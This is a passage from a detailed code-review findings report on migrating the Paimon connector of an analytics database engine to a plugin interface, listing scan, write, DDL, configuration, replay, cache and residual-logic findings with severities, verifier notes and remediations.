reconstruct the line. The only paimon EXPLAIN test (`test_paimon_predict.groovy`) asserts only on `inputSplitNum=N`, so nothing breaks. +- **Remediation:** Re-emit by re-converting the filter (byte-parity with `Predicate.toString()` not reconstructible), or accept as an intentional EXPLAIN simplification recorded in the deviations log. + +#### R3 (scan) — CAST-wrapped predicates not pushed to Paimon + +- **Severity:** MINOR · **Classification:** intentional-deviation · **Verdict:** confirmed +- **Location:** `PaimonConnectorMetadata.java:853-856` (`supportsCastPredicatePushdown=false`); legacy `PaimonPredicateConverter.java:178-200` (unwrap CastExpr). Bridge `PluginDrivenScanNode.buildRemainingFilter:1110-1143`. +- **Description:** Legacy unwrapped `CastExpr`, pushing e.g. `CAST(str_col AS INT)=5` to Paimon as `str_col='5'` exact-equality for source-side pruning — a latent correctness hazard (`'05'`/`' 5'` rows pruned at source, unrecoverable). The connector returns `supportsCastPredicatePushdown=false`, so CAST-bearing conjuncts are stripped before reaching the connector and remain BE-only (re-evaluated on returned rows). **Improves** correctness vs legacy; minor pushdown-selectivity cost. +- **Evidence:** `PaimonConnectorMetadata:854 return false;` with `'05'`/`' 5'` hazard javadoc. Sibling MaxCompute/Jdbc also return false; SPI default is true (`ConnectorPushdownOps:72-74`). Pinned by `PaimonConnectorMetadataTest:228`. +- **Verifier:** Confirmed. Strictly safer; perf-only deviation that improves correctness, not a regression. +- **Remediation:** No action for correctness; record as intentional deviation. Consider lossless-CAST-only pushdown later if selectivity regresses measurably; do not revert to blanket unwrap. + +#### R1 (be) — JNI split `self_split_weight` omitted when weight is 0 + +- **Severity:** NIT · **Classification:** regression · **Verdict:** confirmed +- **Location:** `PaimonScanRange.java:92-94,194-197`. Legacy `PaimonScanNode.java:274`. BE `paimon_jni_reader.cpp:95`, `jni_reader.cpp:62,246-248`. +- **Description:** Legacy unconditionally calls `rangeDesc.setSelfSplitWeight(...)` on the JNI path. The connector stores the weight only when `selfSplitWeight > 0`, so a JNI split with computed weight 0 (non-DataSplit sys split with `rowCount()==0`, or DataSplit with total fileSize 0) leaves it unset → BE reads `-1` instead of 0. +- **Evidence:** `if (builder.selfSplitWeight > 0) { props.put("paimon.self_split_weight", ...); }`. +- **Verifier:** Confirmed; reachable. Impact is profile-only: `_self_split_weight` feeds only the `_max_time_split_weight_counter` diagnostic; never affects rows/counts/predicates/schema. (Finding's evidence has a minor BE line-citation mix-up; both underlying facts hold.) +- **Remediation:** No functional fix required; drop the `> 0` gate if exact profile parity is wanted. + +#### R2 (be) — `history_schema_info` emitted as scan-level dict, not per-split-accumulated + +- **Severity:** NIT · **Classification:** intentional-deviation · **Verdict:** confirmed +- **Location:** `PaimonScanPlanProvider.java:1214-1232` (`buildSchemaEvolutionParam`, call site `:651`). Legacy `PaimonScanNode.java:236-251`. BE `table_schema_change_helper.h:240-266`. +- **Description:** Legacy added history entries lazily, one per distinct file `schema_id` referenced by a split, plus the `-1` entry. The connector emits, once at scan-node level, the `-1` entry **plus** an entry for every committed schema id (`SchemaManager.listAllIds()`). BE needs only the `-1` entry + an entry per split's `schema_id`; `listAllIds()` is a superset, so the "miss table/file schema info" error cannot fire spuriously. +- **Evidence:** `for (Long schemaId : schemaManager.listAllIds()) { history.add(buildSchemaInfo(schemaId, ...)); }`. +- **Verifier:** Confirmed. Paimon schema files are retained (not GC'd like snapshots), so the eager set is always a superset → equivalence holds; only metadata-read cost differs (reads all historical schemas even for single-schema queries). Both sides correctly skip non-data sys tables. +- **Remediation:** Accept as intentional; narrow to planned-split schema_ids only if cost matters on heavily-evolved tables. + +--- + +## Write (INSERT / sink) + +Covered by the **write** finder line. + +### What was reviewed / verified-OK + +Determined that **neither** legacy nor current paimon has a data-write (INSERT / sink / commit) path; the net end-to-end behavior is "INSERT rejected" in both — no data-write regression. Legacy `PaimonMetadataOps` has zero write/commit/`TableWrite` usage and `PaimonExternalCatalog extends ExternalCatalog` directly, so a legacy INSERT hit the catch-all `throw "Load data ... not supported"`. The current `PaimonConnector` declares no write capability (`getCapabilities` = MVCC_SNAPSHOT / TIME_TRAVEL / PARTITION_STATS only; comment "paimon write is not migrated") and does not override `getWritePlanProvider()` (default null); `PaimonConnectorMetadata` overrides zero `ConnectorWriteOps` methods, so `supportsInsert()`/`supportsInsertOverwrite()` default false and `beginInsert`/`getWriteConfig` throw. Every write entry point in the bridge fails loud: plain INSERT at `PhysicalPlanTranslator` (writePlanProvider==null + supportsInsert()==false → AnalysisException), INSERT OVERWRITE at `InsertOverwriteTableCommand.allowInsertOverwrite`, CTAS at the insert stage; redundant guard at `PluginDrivenInsertExecutor.beforeExec:116`. No half-wiring, no capability mismatch. + +### Findings + +| id | title | severity | legacy-class | verdict | +|----|-------|----------|--------------|---------| +| W1 | No paimon data-write path in current or legacy — INSERT correctly rejected | NIT | n/a | confirmed | +| W2 | INSERT rejection moved from sink-creator to translation-time AnalysisException | NIT | intentional-deviation | confirmed | + +#### W1 — No paimon data-write path (no regression) + +- **Severity:** NIT · **Classification:** n/a · **Verdict:** confirmed +- **Location:** `PaimonConnector.java:111-119`; `PaimonConnectorMetadata.java:73`. +- **Description:** Recorded only to make the "no write path" determination explicit. Both legacy and current reject INSERT/INSERT OVERWRITE/CTAS-as-write loudly. +- **Verifier:** Confirmed. Minor framing nit: on the SPI branch paimon is a `PluginDrivenExternalCatalog`, so the legacy `UnboundTableSinkCreator` throw is bypassed and rejection is downstream at the translator (which the finding also cites). Net conclusion holds. +- **Remediation:** None. Optionally add a regression test asserting INSERT INTO paimon raises a clear error to lock the contract. + +#### W2 — INSERT rejection moved to translation-time AnalysisException + +- **Severity:** NIT · **Classification:** intentional-deviation · **Verdict:** confirmed +- **Location:** `PhysicalPlanTranslator.java:655-683`; `UnboundTableSinkCreator.java` (DML overloads `:102/:106`, overwrite `:140/:145`). +- **Description:** Because paimon is now a `PluginDrivenExternalCatalog`, an INSERT routes to `UnboundConnectorTableSink` instead of the legacy catch-all throw; `BindSink` binds a `LogicalConnectorTableSink` without checking capability; rejection surfaces at translation (`supportsInsert()==false` → `throw AnalysisException("Connector ... (type: paimon) does not support INSERT operations")`). User-visible outcome unchanged; only stage/wording differ. Backup guard at `PluginDrivenInsertExecutor:116`. +- **Verifier:** Confirmed. The finding's primary citation (`:65/:68`) is the no-DML overload; a real INSERT uses the DML overloads, which behave identically — strengthens the finding. +- **Remediation:** None; message is arguably clearer than legacy. + +--- + +## DDL (catalog / db / table / CTAS) and config + +Covered by three finder lines: **ddl-catalog** (CREATE/DROP CATALOG & DATABASE), **ddl-table** (CREATE/DROP TABLE, CTAS, type mapping), and **config** (storage credentials + metastore connection assembly). + +### What was reviewed / verified-OK + +**Catalog/DB dispatch.** `CatalogFactory.createCatalog` routes `paimon` through `SPI_READY_TYPES` → `PluginDrivenExternalCatalog`; metastore flavor resolved from `paimon.catalog.type` (default `filesystem`, lowercased) byte-equivalently to legacy. Unknown flavor rejected at CREATE CATALOG (`MetaStoreProviders.bind` → `IllegalArgumentException` → `DdlException`), functionally equivalent to legacy. **CREATE/DROP DATABASE are dispatched** (the legacy no-op bug class is closed): `PluginDrivenExternalCatalog` overrides `createDb`/`dropDb`/`createTable`/`dropTable` despite `metadataOps==null`, reaching the connector. HMS-only create-db-with-props gate, force-cascade drop, and exception wrapping mirror legacy (pinned by `PaimonConnectorMetadataDbDdlTest`, 10 tests). + +**CREATE/DROP TABLE + type mapping.** Doris→Paimon scalar mapping (`PaimonTypeMapping` vs `DorisToPaimonTypeVisitor`) verified byte/behavior-equivalent (CHAR/VARCHAR/STRING→VarChar(MAX), DATETIME→plain TimestampType, DECIMAL families, VARBINARY/VARIANT, unsupported throws in both). Nested-type nullability non-divergent (every Doris nested type is nullable by default; map key forced `.copy(false)` identically). Paimon→Doris read-back, property normalization (strip PK+comment, location→`CoreOptions.PATH`), primary/partition keys, IF NOT EXISTS double-create probing (remote + local two-arm) all at parity. Two documented intentional deviations (COMMENT-clause fallback, blank-PK-token filtering) are safe. + +**Config assembly.** Object-store backends **S3 / OSS / COS / OBS** reproduce legacy per-key (S3A impl, endpoint/region, credential providers when AK present, tuning defaults — S3 50/3000/1000, OSS/COS/OBS 100/10000/10000, Jindo OSS, COS `fs.cosn.*`, OBS native/S3A branch, 8 DLF `dlf.catalog.*` keys, endpoint-from-region). All **five metastore flavors** (HMS HiveConf assembly with storage-overlay-before-kerberos ordering, REST re-key + case-sensitive dlf-token rule, JDBC driver registration + create-time security gate, FS) reproduce legacy. Vended creds REST-only path threaded. Two real gaps found below (MinIO, HDFS) plus two minor deviations. + +### Findings + +| id | title | severity | legacy-class | verdict | +|----|-------|----------|--------------|---------| +| R1 (catalog) | CREATE DATABASE already-exists error code differs | NIT | intentional-deviation | partial | +| R2 (catalog) | Legacy paimon table-cache CacheSpec validations not ported | MINOR | missing-port | confirmed | +| R3 (catalog) | `listDatabaseNames` swallows remote failures → empty | MINOR | intentional-deviation | confirmed | +| R1 (table) | CREATE TABLE remote-only existing table loses MySQL errno 1050 | MINOR | regression | confirmed | +| R3 (table) | Auto/expression partition rejected where legacy silently stripped | MINOR | intentional-deviation | confirmed | +| C1 (config) | MinIO storage backend unbindable for pure `minio.*` catalogs | MAJOR | regression | partial | +| C2 (config) | HDFS catalog-create drops legacy-derived config keys | MAJOR | missing-port | confirmed | +| C4 (config) | HMS socket timeout hardcoded 10s, ignores `hive_metastore_client_timeout_second` | MINOR | missing-port | confirmed | + +(`ddl-table R2` and `config C3` were refuted — see appendix.) + +#### R1 (catalog) — CREATE DATABASE already-exists error code differs + +- **Severity:** NIT · **Classification:** intentional-deviation · **Verdict:** partial +- **Location:** `PaimonConnectorMetadata.java:789-806`; `PluginDrivenExternalCatalog.java:354-380` (gate at `:368`). +- **Description (as filed):** Bridge consults remote `databaseExists` only when `ifNotExists` is true; a plain CREATE DATABASE on an existing-remote/cache-absent db falls through to `createDatabase(ignoreIfExists=false)`, paimon throws `DatabaseAlreadyExistException`, wrapped as generic `DdlException`. Filed as "ERR_DB_CREATE_EXISTS (1007) vs generic DdlException". +- **Verifier (partial — corrected):** Mechanism real and grade right, but the **error-code premise is inaccurate**: legacy `performCreateDb` does call `ERR_DB_CREATE_EXISTS`, but that throw happens inside `createDbImpl`'s own `catch(Exception)` which re-wraps via `DdlException(String, Throwable)` — which does **not** set the MySQL code. So legacy also loses code 1007 before the client sees it. The only real divergence is **message-string** wording, not an error code. +- **Remediation:** Acceptable as-is; surface a dedicated message only if client tooling depends on the exact text. + +#### R2 (catalog) — Legacy paimon table-cache CacheSpec validations not ported + +- **Severity:** MINOR · **Classification:** missing-port · **Verdict:** confirmed +- **Location:** legacy `PaimonExternalCatalog.java:161-170` vs current `PluginDrivenExternalCatalog.java:162-173`. +- **Description:** Legacy validated `meta.cache.paimon.table.{enable,ttl-second,capacity}` at CREATE CATALOG via `CacheSpec.check*` (throws `DdlException` for malformed values). The plugin path's `checkProperties` does not re-run these; a malformed value (`capacity=-5`, `ttl-second=abc`) that legacy rejected is now accepted. +- **Verifier:** Confirmed. Blast radius correctly bounded — these keys are **dead on the plugin path** (`PaimonExternalMetaCache`/`ExternalMetaCacheMgr.paimon` have zero non-legacy callers; plugin path uses the generic schema cache), so even well-formed values are no-ops. No query-correctness impact. +- **Remediation:** Prefer warn-and-strip at create (keys are confirmed dead); restoring full validation would re-impose checks on knobs that no longer do anything. + +#### R3 (catalog) — `listDatabaseNames` swallows remote failures → empty + +- **Severity:** MINOR · **Classification:** intentional-deviation · **Verdict:** confirmed +- **Location:** `PaimonConnectorMetadata.java:95-104` vs legacy `PaimonMetadataOps.java:336-342`. +- **Description:** Legacy rethrew a metastore enumeration failure as `RuntimeException`; current catches `Exception`, `LOG.warn`s (no catalog name), returns `emptyList()`. A transient remote failure now presents as "zero databases" (empty SHOW DATABASES) rather than an error. Reaches the user via `PluginDrivenExternalCatalog.listDatabaseNames` → DB-init. +- **Verifier:** Confirmed. **Caveat:** the finding's mitigating claim of a "shared best-effort convention" is factually wrong — Hive/Hudi/JDBC/MaxCompute/Trino all propagate; Iceberg's emptyList is only for a structural unsupported-namespaces case. Paimon is the **sole** connector swallowing a generic remote failure. Low impact (diagnosability/UX only). +- **Remediation:** Keep best-effort if intended but include catalog name in the `LOG.warn` (legacy message did); or distinguish empty-catalog from remote-error and rethrow the latter. + +#### R1 (table) — CREATE TABLE remote-only existing table loses MySQL errno 1050 + +- **Severity:** MINOR · **Classification:** regression · **Verdict:** confirmed +- **Location:** `PluginDrivenExternalCatalog.java:298-321`; `PaimonConnectorMetadata.java:725-739`. Legacy `PaimonMetadataOps.java:189-197`. +- **Description:** Legacy reported `ERR_TABLE_EXISTS_ERROR` (1050 / 42S01) when the table existed remotely and no IF NOT EXISTS. The bridge raises 1050 only for the **local-cache-conflict** arm (`:310-313`); a table existing **only remotely** falls through to `createTable(ignoreIfExists=false)` → `TableAlreadyExistException` → generic `DdlException`. CREATE still fails; only the error code/SQLSTATE/message changed. +- **Evidence:** `if (localExists) { ErrorReport.reportDdlException(ERR_TABLE_EXISTS_ERROR, ...); }` — local arm only; bridge comment self-documents the gap. +- **Verifier:** Confirmed. errno 1050 is a documented MySQL contract some ORMs branch on, so MINOR (not NIT). Reachability narrow (table exists remotely but absent from this FE cache — stale cache / other-FE / external create). The bridge already computes `remoteExists`. +- **Remediation:** Mirror the local arm: `if (remoteExists && !ifNotExists) reportDdlException(ERR_TABLE_EXISTS_ERROR, ...)` before falling through. + +#### R3 (table) — Auto/expression partition rejected where legacy silently stripped + +- **Severity:** MINOR · **Classification:** intentional-deviation · **Verdict:** confirmed +- **Location:** `PaimonSchemaBuilder.java:122-139`; `CreateTableInfoToConnectorRequestConverter.java:125-191`. Legacy `PaimonMetadataOps.java:244` + `PartitionDesc.java:105-157`. +- **Description:** For an expression/auto partition (e.g. `PARTITION BY RANGE(date_trunc(col,...))`) legacy returned the bare underlying column names and silently dropped the transform, creating a table partitioned by the bare column. The converter emits a TRANSFORM field and the connector throws `DorisConnectorException("Paimon only supports identity partition columns, got transform: ...")`. Deliberate, safer deviation (mirrors MaxCompute `identityPartitionColumns`); changes behavior only for the auto-partition edge case (error vs silent partition-by-column). +- **Verifier:** Confirmed full chain (UnboundFunction → `transform=date_trunc` → guard → `DdlException`). Identity and LIST partitions unaffected. +- **Remediation:** Keep the explicit rejection; document as intentional deviation in HANDOFF. + +#### C1 (config) — MinIO storage backend unbindable + +- **Severity:** MAJOR (downgraded from BLOCKER) · **Classification:** regression · **Verdict:** partial +- **Location:** `S3FileSystemProvider.java:45-73` (supports/aliases); `FileSystemFactory.java:131-141` (no-match → empty list, no throw). +- **Description:** Legacy `MinioProperties` recognized `minio.endpoint/access_key/secret_key/region/session_token/connection.*/use_path_style` (region default `us-east-1`) and produced S3A config. The new path sources storage exclusively from fe-filesystem, which has **no MinIO provider** (registered: local/oss/azure/broker/s3/hdfs/cos/obs); `S3FileSystemProvider.supports()` and `S3FileSystemProperties` aliases include no `minio.*` key. A pure `minio.*` CREATE CATALOG matches no provider → `bindAllStorageProperties` returns empty (no throw) → empty hadoop map → no `fs.s3.impl` → paimon read fails "no file io for scheme s3". +- **Verifier (partial — corrected to MAJOR):** Mechanism and regression confirmed; no `minio.*→s3.*` normalization exists anywhere (grep ZERO). **But BLOCKER overstates impact:** every paimon MinIO regression suite (`test_paimon_table_properties.groovy` etc.) configures MinIO via canonical `s3.endpoint/s3.access_key/s3.secret_key`, which **do** match `S3FileSystemProvider` and work end-to-end. The default/tested MinIO path is unaffected; only the legacy `minio.*`-aliased namespace is broken, with a trivial `s3.*` workaround and zero test coverage demonstrating reliance. +- **Per-key loss (pure `minio.*` only):** endpoint, region(us-east-1), access_key, secret_key, session_token, connection.maximum(100), connection.request.timeout(10000), connection.timeout(10000), use_path_style(false), force_parsing_by_standard_uri. (Mixed configs using generic `s3.*`/`endpoint`/`region` aliases still bind.) +- **Remediation:** Add `minio.*` aliases to `S3FileSystemProperties` endpoint/region/access_key/secret_key/session_token/connection.*/use_path_style and to `S3FileSystemProvider.supports()` (region default `us-east-1`); or add a dedicated MinIO fe-filesystem provider. + +#### C2 (config) — HDFS catalog-create drops legacy-derived config keys + +- **Severity:** MAJOR · **Classification:** missing-port · **Verdict:** confirmed +- **Location:** `PaimonConnector.java:222-228` (`buildStorageHadoopConfig`) + `PaimonCatalogFactory.java:287-297` (raw passthrough, `:294`); `HdfsFileSystemProperties.java` (does not implement `HadoopStorageProperties`). +- **Description:** Legacy built the HDFS Configuration from `HdfsProperties.getHadoopStorageConfig()` emitting: (1) keys loaded from `hadoop.config.resources` XML; (2) `ipc.client.fallback-to-simple-auth-allowed` default `true`; (3) `hdfs.security.authentication=`; (4) kerberos `hadoop.*` derived from canonical `hdfs.authentication.{type,kerberos.principal,kerberos.keytab}` aliases; (5) `juicefs.*`. The new catalog-create path builds the Configuration only from `applyStorageConfig`'s raw passthrough of `fs.`/`dfs.`/`hadoop.` keys, so all five are dropped — HA HDFS via xml cannot resolve its nameservice; a catalog using `hdfs.authentication.*` aliases never gets `hadoop.security.authentication=kerberos`. +- **Verifier:** Confirmed. **Scope clarification (does not change severity):** the gap is strictly the **FE-side catalog-create** Configuration; the **BE/scan path is NOT affected** — `PaimonScanPlanProvider.java:620` consumes `sp.toBackendProperties().toMap()`, which for HDFS returns the full backend map (XML, ipc default, hdfs.security.authentication, kerberos-from-alias, juicefs). Kerberos UGI login is FE-injected via `executeAuthenticated`. Genuine connectivity break for HA-HDFS-via-xml + FILESYSTEM/JDBC flavors, gated and with raw-`hadoop.*` workarounds → MAJOR not BLOCKER. No test covers the gap (`PaimonCatalogFactoryTest:218-238` only asserts the reduced raw passthrough). +- **Remediation:** Have `buildStorageHadoopConfig`/`buildHadoopConfiguration` also fold in `sp.toBackendProperties().toMap()` for HDFS (reuses the already-ported map), or implement `HadoopStorageProperties` on `HdfsFileSystemProperties`. Verify a Kerberized HA HDFS paimon catalog with `hdfs.authentication.*` aliases + `hadoop.config.resources` can connect via the plugin path. + +#### C4 (config) — HMS socket timeout hardcoded 10s + +- **Severity:** MINOR · **Classification:** missing-port · **Verdict:** confirmed +- **Location:** `HmsMetaStorePropertiesImpl.java:179-181`. Legacy `HMSBaseProperties.java:204-208`. +- **Description:** Legacy set the metastore client socket timeout from `Config.hive_metastore_client_timeout_second` when the user had not overridden `hive.metastore.client.socket.timeout`; the connector hardcodes literal `"10"` (the current default). A user-set per-catalog property suppresses the default in both. The only divergence: an operator who raises `fe.conf hive_metastore_client_timeout_second` (e.g. 60) without the per-catalog property gets 60 in legacy but 10 here. +- **Verifier:** Confirmed (guard-key equivalence checked by disassembly). The FE Config value is genuinely unreachable from the connector — `ConnectorContext.getEnvironment()` exposes only doris_home and jdbc_drivers_dir, and metastore-spi has no fe-common dependency. Introduced by the SPI move. Opt-in-tuning-only; default preserved. +- **Remediation:** Thread the FE config value through `ConnectorContext.getEnvironment()` (or a dedicated accessor) instead of literal `"10"`. Low urgency. + +--- + +## Metadata replay (persist / restart / GSON) + +Covered by the **replay** finder line. **No findings** (zero defects in this dimension). + +### What was reviewed / verified-OK + +Persisted-state parity and replay-rebuild were traced clean-room: the bridge persisted objects (`PluginDrivenExternalCatalog/Database/Table`, `PluginDrivenMvccExternalTable`) and runtime carriers (`PluginDrivenMvccSnapshot`, `PluginDrivenSchemaCacheValue`), GSON `RuntimeTypeAdapterFactory` registrations, and base `ExternalCatalog` field/transient layout, against legacy paimon classes + legacy GSON registrations. Verified: + +1. **Persisted shape identical** — both legacy paimon classes and current PluginDriven classes add zero `@SerializedName` fields; both persist only the base hierarchy + `catalogProperty` (which carries `type` and `paimon.catalog.type`). No field added/dropped. +2. **All three GSON subtype registrations present and consistent** — Catalog: PluginDriven default + `registerCompatibleSubtype` for all 5 legacy flavor class names. Database: `PaimonExternalDatabase` → `PluginDrivenExternalDatabase`. Table: `PaimonExternalTable` → `PluginDrivenMvccExternalTable` (correctly the MVCC variant). No missing registration → no replay ClassCastException. +3. **Flavor preserved on replay** — both derive flavor solely from `paimon.catalog.type`; collapsing 5 class names onto one PluginDriven catalog loses no flavor info (the legacy `*HMS/*DLF/*File/*Rest` subclasses were `@Deprecated` pass-throughs). +4. **Transient re-init complete** — post-deserialization `connector==null`; `initLocalObjects()` gated on non-persisted `objectCreated` rebuilds connector + transactionManager + executionAuthenticator from `catalogProperty`. +5. **type/logType migration** — `CatalogFactory` force-persists `type=paimon`; `gsonPostProcess` backfills type from logType and migrates `logType PAIMON→PLUGIN`. +6. **MVCC snapshot not persisted** — both snapshots are per-query runtime objects, never GSON-registered. + +**Overall:** persistence + replay + GSON serde at parity; no regressions, missing ports, or standalone defects. + +--- + +## Metadata cache (schema / partition / sys-table / mvcc) + +Covered by the **cache** finder line. + +### What was reviewed / verified-OK + +Reviewed the connector (`PaimonConnectorMetadata`, `PaimonTableResolver`, `PaimonCatalogOps`) and the bridges (`PluginDrivenExternalTable`, `PluginDrivenMvccExternalTable`, `PluginDrivenMvccSnapshot`, `PluginDrivenSysExternalTable`, `ExternalMetaCacheInvalidator`) against the legacy paimon cache stack, tracing the actual fill/hit/invalidate/refresh wiring. The architecture deliberately replaces legacy's two engine-specific caches with (a) a single name-keyed latest-schema entry in the generic `DefaultExternalMetaCache`, and (b) **no second-level partition/snapshot cache** — partition view + snapshot pin + schema-at-snapshot are listed once per query and held on the per-statement `PluginDrivenMvccSnapshot` (the CACHE-P1 design). + +Verified at parity: single-pin MVCC consistency within one query; no two-snapshot key collision (time-travel schemas never enter the shared cache); REFRESH TABLE reaches the cache (`forTableIdentity` invalidation → fresh `getTableHandle+getTableSchema`); REFRESH CATALOG nulls+rebuilds the connector; sys-table schema resolution via `getSchemaCacheValue` override (closes the legacy missing-override bug class); no hidden stale Table cache in the connector; partition staleness `Partition.lastFileCreationTime()` → `MTMVTimestampSnapshot`; `isPartitionInvalid` + `getNewestUpdateVersionOrTime` bypass-pin semantics. **No BLOCKER/MAJOR**; deviations are intentional (CACHE-P1) and TTL/REFRESH-bounded with the same effective staleness profile as legacy. + +### Findings + +| id | title | severity | legacy-class | verdict | +|----|-------|----------|--------------|---------| +| MC1 | Latest schema cached name-only (no schemaId in key) | MINOR | intentional-deviation | confirmed | +| MC2 | Time-travel schema re-resolved per query (no second-level cache) | NIT | intentional-deviation | confirmed | + +#### MC1 — Latest schema cached name-only + +- **Severity:** MINOR · **Classification:** intentional-deviation · **Verdict:** confirmed +- **Location:** `ExternalTable.java:423-426`; `ExternalMetaCacheMgr.java:425-433`. Legacy `PaimonExternalMetaCache.java:73-75` + `PaimonSchemaCacheKey.java`. +- **Description:** Legacy keyed the schema cache by `(NameMapping, schemaId)` and derived the latest schemaId from the latest-snapshot projection. The new model keys by NameMapping only and reads `table.rowType()` of a freshly-resolved handle on each miss. Both TTL-bound and need REFRESH for immediate consistency; no concrete wrong-result scenario. Flagged only because the keying mechanism differs. +- **Verifier:** Confirmed. Time-travel schema IS pinned separately (`loadSnapshot` stores `pinnedSchema`), so two snapshots do not collide on the name-only key. Under async snapshot-cache refresh, legacy could surface an evolved latest schema marginally earlier; new model waits on the schema entry's own TTL/REFRESH — "different staleness shape, no substantiated regression." +- **Remediation:** Optional one-line doc note on `PluginDrivenExternalTable.initSchema()`; no code change. + +#### MC2 — Time-travel schema re-resolved per query + +- **Severity:** NIT · **Classification:** intentional-deviation · **Verdict:** confirmed +- **Location:** `PluginDrivenMvccExternalTable.java:259-271`. Legacy `PaimonExternalTable.java:338-371` + schemaEntry. +- **Description:** Legacy served a FOR VERSION/TIME AS OF schema from the shared `(NameMapping, schemaId)` cache (repeated time-travel hit cache). The new model resolves schema-at-snapshot fresh inside `loadSnapshot` every query and pins it for that statement only — one extra `schemaAt` round-trip per time-travel query, within the CACHE-P1 design. Latest reads still cached via super; correctness preserved. +- **Verifier:** Confirmed; scoped to time-travel only. Pure perf trade. +- **Remediation:** None; a connector-side schemaId-keyed memo could be reintroduced later without touching the bridge if measured overhead warrants. + +--- + +## Residual old logic / fallback (B8 scoping) + +Covered by the **residual** finder line. + +### What was reviewed / verified-OK + +Swept the connector module (18 main classes) and the generic bridge for residual legacy logic, fallbacks, source-name branches, and dead-vs-live status. Verified clean: `tools/check-connector-imports.sh` exits 0 (connector does **not** illegally import fe-core; only doc-comment legacy-parity notes). All connector `instanceof` are legitimate Paimon-SDK/SPI dispatch. Connector `"paimon"` literals are its own identity registration. No force_jni/legacy fallback to fe-core. Generic bridge `getEngine()` switch is connector-agnostic TableType-identity preservation. Cut-over paimon never hits the legacy `instanceof Paimon*`/`Type.PAIMON` branches in Env SHOW-CREATE / `buildDbForInit` / ShowPartitions / UserAuthentication / RouteResolver — all take the PluginDriven branch; the legacy branches are DEAD-but-harmless. + +### Findings + +| id | title | severity | legacy-class | verdict | +|----|-------|----------|--------------|---------| +| R1 | LIVE path depends on legacy `property/metastore/Paimon*` + `PaimonExternalCatalog` constants | BLOCKER | n/a | confirmed | +| R2 | `property/storage/{S3,OSS,COS,OBS,Minio}Properties` shared cross-connector infra | BLOCKER | n/a | confirmed | +| R3 | Generic bridge source-name-branches VERBOSE per-backend EXPLAIN to paimon only; MaxCompute loses `backends:` block | MINOR | regression | partial | +| R4 | Dead legacy paimon handler/imports in `ShowPartitionsCommand` | MINOR | intentional-deviation | confirmed | +| R5 | Dead legacy paimon branches in Env / ExternalCatalog / UserAuthentication / RouteResolver | MINOR | intentional-deviation | confirmed | +| R6 | `systable/PaimonSysTable` + `metacache/paimon/*` + `ExternalMetaCacheMgr.paimon()` dead-for-cutover but compile-referenced | MINOR | intentional-deviation | confirmed | + +#### R1 — LIVE path depends on legacy metastore-props (NOT deletable) + +- **Severity:** BLOCKER · **Classification:** n/a · **Verdict:** confirmed +- **Location:** `PluginDrivenExternalCatalog.java:121/130/136-137`; `MetastoreProperties.java:90`; `PaimonPropertiesFactory.java:28-32`; `AbstractPaimonProperties.java:73-84`; `PaimonFileSystemMetaStoreProperties.java:21,82`. +- **Description:** The cut-over `initPreExecutionAuthenticator()` calls `catalogProperty.getMetastoreProperties()` → `MetastoreProperties.create()` → `PaimonPropertiesFactory` which instantiates the legacy `Paimon{FileSystem,HMS,AliyunDLF,Jdbc,Rest}MetaStoreProperties`. `AbstractPaimonProperties.initHdfsExecutionAuthenticator` wires the HDFS Kerberos `HadoopExecutionAuthenticator` — load-bearing for kerberized filesystem/jdbc paimon. These classes also import `datasource/paimon/PaimonExternalCatalog` constants (`PAIMON_FILESYSTEM`/`PAIMON_HMS`). +- **Verifier:** Confirmed. Live runtime + compile dependency both real; deleting `PaimonExternalCatalog` breaks compilation of 5 live metastore-props classes; deleting the metastore-props breaks Kerberos wiring for cutover paimon. Connector import check rc=0 (this is engine-bridge→fe-core-legacy, not a connector violation). HANDOFF.md:36-42 lists exactly these as B8 targets. +- **Remediation:** Before B8: KEEP `property/metastore/Paimon*MetaStoreProperties` + `PaimonPropertiesFactory` + `AbstractPaimonProperties`; migrate the `PAIMON_FILESYSTEM`/etc. constants out of `datasource/paimon/PaimonExternalCatalog` into the metastore-props module **before** deleting `PaimonExternalCatalog`. Do NOT delete `PaimonExternalCatalog` without first severing these 5 imports. + +#### R2 — `property/storage/*` shared cross-connector infra (NOT deletable) + +- **Severity:** BLOCKER · **Classification:** n/a · **Verdict:** confirmed +- **Location:** `property/storage/{S3,OSS,COS,OBS,Minio}Properties.java` (consumers across iceberg/hive/glue/dlf/storage-vault/load/cloud/policy). +- **Description:** The B8 scope text lists these as deletion candidates, but they are not paimon-specific; the paimon connector uses its own filesystem SPI while the rest of the engine still consumes `property/storage/*`. Deleting them is a whole-engine break. +- **Verifier:** Confirmed. The paimon connector AND even the legacy fe-core paimon tree reference none of these 5 classes. Concrete consumers verified: `DLFCatalog.java:22`, `StoragePolicy.java:20`, `S3StorageVault.java:24`, `BrokerLoadJob.java:29`, `S3ConnectivityTester.java:23`, `IcebergRestProperties.java:48`. Count nuance: finding said 83 (broad `property.storage.*` grep = 122 files repo-wide); the 5 named classes have ~26 named main-source consumers. Either metric → shared infra. +- **Remediation:** Explicitly EXCLUDE `property/storage/*` from the B8 paimon-deletion set; only the connector's own in-module storage was replaced. + +#### R3 — Generic bridge source-name-branches VERBOSE EXPLAIN to paimon only + +- **Severity:** MINOR (downgraded from MAJOR) · **Classification:** regression · **Verdict:** partial +- **Location:** `PluginDrivenScanNode.java:305-308`; baseline `FileScanNode.java:151-152,253-256`. +- **Description:** `FileScanNode` emits `appendBackendScanRangeDetail()` (the `backends:` block + per-file paths + dataFileNum/deleteFileNum/deleteSplitNum) **unconditionally** for `VERBOSE && !isBatchMode()`. `PluginDrivenScanNode` overrides without calling super and re-emits that block **only when `"paimon".equals(catalog.getType())`**. Legacy `MaxComputeScanNode` (extends `FileQueryScanNode`, no override) DID show the block; after cutover, cut-over MaxCompute VERBOSE EXPLAIN loses it. Direct violation of the project rule that `PluginDrivenScanNode` must not branch on source name for universal `FileScanNode` behavior; the inline comment claiming MaxCompute output stays byte-unchanged is wrong. +- **Verifier (partial — corrected to MINOR):** All facts verified (git baseline + routing). Real regression but **EXPLAIN-VERBOSE diagnostic-only** (no query/data impact) and **no regression test asserts `backends:` for maxcompute** → MAJOR overstates user impact; MINOR is right. **Note: this is in the GENERIC bridge and affects MaxCompute, not a paimon-only concern.** +- **Remediation:** Emit `appendBackendScanRangeDetail()` unconditionally under `VERBOSE && !isBatchMode()` (matching `FileScanNode`); connectors without delete files naturally render deleteFileNum=0 via `getDeleteFiles→empty`. Keep `paimonNativeReadSplits` behind the SPI `appendExplainInfo` delegation. Also fixes the false inline comment. + +#### R4 — Dead legacy paimon handler/imports in `ShowPartitionsCommand` + +- **Severity:** MINOR · **Classification:** intentional-deviation · **Verdict:** confirmed +- **Location:** 